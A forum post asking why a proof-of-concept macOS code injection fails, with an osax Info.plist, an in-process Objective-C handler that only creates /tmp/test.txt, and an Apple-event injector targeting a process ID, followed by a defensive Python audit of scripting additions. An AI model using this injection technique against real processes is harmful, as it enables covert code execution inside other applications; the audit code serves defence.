
applescript injection POC

Posted: Mon Nov 06, 2017 4:24 pm
by adam81
I am trying to make a POC of code injection using the AppleScript injection technique which is used in the GitHub project EasySIMBL.

The method is also described here. (It's basically a huge article, just search for AppleScript at bundle injection, and you'll get there.)

The steps I've done:

1. I made a bundle with an osax suffix that creates a file at /tmp/test.txt. The bundle contains the following items:
1.1 Info.plist:

Code:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>CFBundleDevelopmentRegion</key>
    <string>English</string>
    <key>CFBundleExecutable</key>
    <string>OsaxLoaded</string>
    <key>CFBundleIdentifier</key>
    <string>com.yourcompany.OsaxLoaded</string>
    <key>CFBundleInfoDictionaryVersion</key>
    <string>6.0</string>
    <key>CFBundleName</key>
    <string>OsaxLoaded</string>
    <key>CFBundlePackageType</key>
    <string>osax</string>
    <key>CFBundleShortVersionString</key>
    <string>1.0</string>
    <key>CFBundleSignature</key>
    <string>ascr</string>
    <key>CFBundleVersion</key>
    <string>1</string>
    <key>OSAScriptingDefinition</key>
    <string>app.sdef</string>
    <key>OSAXHandlers</key>
    <dict>
        <key>Events</key>
        <dict>
            <!-- 4-char event class 'OPNe' + 4-char event ID 'open' -->
            <key>OPNeopen</key>
            <dict>
                <key>Context</key>
                <string>Process</string>
                <key>Handler</key>
                <string>InjectEventHandler</string>
                <key>ThreadSafe</key>
                <true/>
            </dict>
        </dict>
    </dict>
</dict>
</plist>



1.2 The code to be injected (osax bundle):

Code:
//  main.m
//  OsaxLoaded
//

#import <Foundation/Foundation.h>
#import <CoreServices/CoreServices.h>   // AppleEvent, OSErr, noErr

// Exported with default visibility so the scripting-addition loader can resolve
// the symbol named under OSAXHandlers/Events/OPNeopen/Handler in Info.plist.
__attribute__((visibility("default")))
OSErr InjectEventHandler(const AppleEvent *ev, AppleEvent *reply, long refcon)
{
    OSErr resultCode = noErr;
    // Marker of execution inside the host process: create an empty file.
    [[NSFileManager defaultManager] createFileAtPath:@"/tmp/test.txt" contents:nil attributes:nil];
    return resultCode;
}



Here's the structure of my osax bundle:

Code:
sh-3.2# ls /Library/ScriptingAdditions/OsaxLoaded.osax/Contents/
Info.plist    MacOS        _CodeSignature


2. Now I put the osax bundle at /Library/ScriptingAdditions/

3. Then I wrote a template Cocoa app (the injection target) that does nothing (I didn't add any additional code).

4. In addition I wrote a Mach-O that should make the app I wrote previously load the scripting addition (osax bundle). After that it sends the event that corresponds to the event in Info.plist and should execute the handler I wrote in the osax bundle's Mach-O.

The injector code:

Code:
//  main.m
//  OsaxInjector
//

#import <Foundation/Foundation.h>
#import <Carbon/Carbon.h>
#import <ScriptingBridge/ScriptingBridge.h>

int main(int argc, const char * argv[]) {
    @autoreleasepool {
        if (argc != 2)
        {
            printf("USAGE: injector pid\n");
            return 1;
        }
        pid_t pid = atoi(argv[1]);
        // Address the target process by pid through Scripting Bridge.
        SBApplication* sbApp = [SBApplication applicationWithProcessIdentifier:pid];
        // First event (AppleScript suite / GetAEUT): should make the target load scripting additions.
        [sbApp setSendMode:kAENoReply | kAENeverInteract | kAEDontRecord];
        [sbApp sendEvent:kASAppleScriptSuite id:kGetAEUT parameters:0];

        // Inject! Event class 'OPNe' / id 'open' matches the OPNeopen key in the osax Info.plist.
        [sbApp setSendMode:kAENoReply | kAENeverInteract | kAEDontRecord];
        id injectReply = [sbApp sendEvent:'OPNe' id:'open' parameters:0];
        if (injectReply != nil) {
            NSLog(@"unexpected injectReply: %@", injectReply);
        }
        [[NSProcessInfo processInfo] disableSuddenTermination];
    }
    return 0;
}

When tested using the pid provided by lsappinfo info "ToInjectApp", it seems like the code wasn't injected and /tmp/test.txt wasn't created.

Any idea what I am doing wrong?

OS Version: Sierra
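Added example (my own code, not from the post or from EasySIMBL): a defender-side audit that parses an osax bundle's Info.plist the way the loader reads it and lists handlers declared with Context "Process" by non-Apple bundles under /Library/ScriptingAdditions. The plist literal is a constructed sample mirroring the one above; SAMPLE_INFO_PLIST, osax_handlers and audit_scripting_additions are names I chose.

```python
import os
import plistlib

# Constructed sample mirroring the Info.plist layout from the post (not read from disk).
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>CFBundleIdentifier</key><string>com.yourcompany.OsaxLoaded</string>
  <key>CFBundlePackageType</key><string>osax</string>
  <key>OSAXHandlers</key><dict><key>Events</key><dict>
    <key>OPNeopen</key><dict>
      <key>Context</key><string>Process</string>
      <key>Handler</key><string>InjectEventHandler</string>
      <key>ThreadSafe</key><true/>
    </dict>
  </dict></dict>
</dict></plist>"""


def osax_handlers(info_plist_bytes):
    """Return one dict per handler under OSAXHandlers/Events.  Each Events key is
    a 4-char event class + 4-char event ID ("OPNeopen" -> 'OPNe'/'open');
    Context "Process" means the handler runs inside the receiving process."""
    info = plistlib.loads(info_plist_bytes)
    bundle_id = info.get("CFBundleIdentifier", "?")
    handlers = []
    for key, spec in info.get("OSAXHandlers", {}).get("Events", {}).items():
        handlers.append({"bundle_id": bundle_id, "event_class": key[:4],
                         "event_id": key[4:8], "handler": spec.get("Handler", "?"),
                         "in_process": spec.get("Context") == "Process"})
    return handlers


def audit_scripting_additions(root="/Library/ScriptingAdditions"):
    """List in-process handlers from non-Apple bundles found under root."""
    findings = []
    if not os.path.isdir(root):
        return findings
    for entry in sorted(os.listdir(root)):
        plist_path = os.path.join(root, entry, "Contents", "Info.plist")
        if not entry.endswith(".osax") or not os.path.isfile(plist_path):
            continue
        with open(plist_path, "rb") as fh:
            data = fh.read()
        for h in osax_handlers(data):
            if h["in_process"] and not h["bundle_id"].startswith("com.apple."):
                findings.append((entry, h))
    return findings
```

Run on a Mac, each finding names a bundle whose executable is loaded into any application that receives the listed four-character event, which is exactly the mechanism the post relies on and therefore worth reviewing in an inventory.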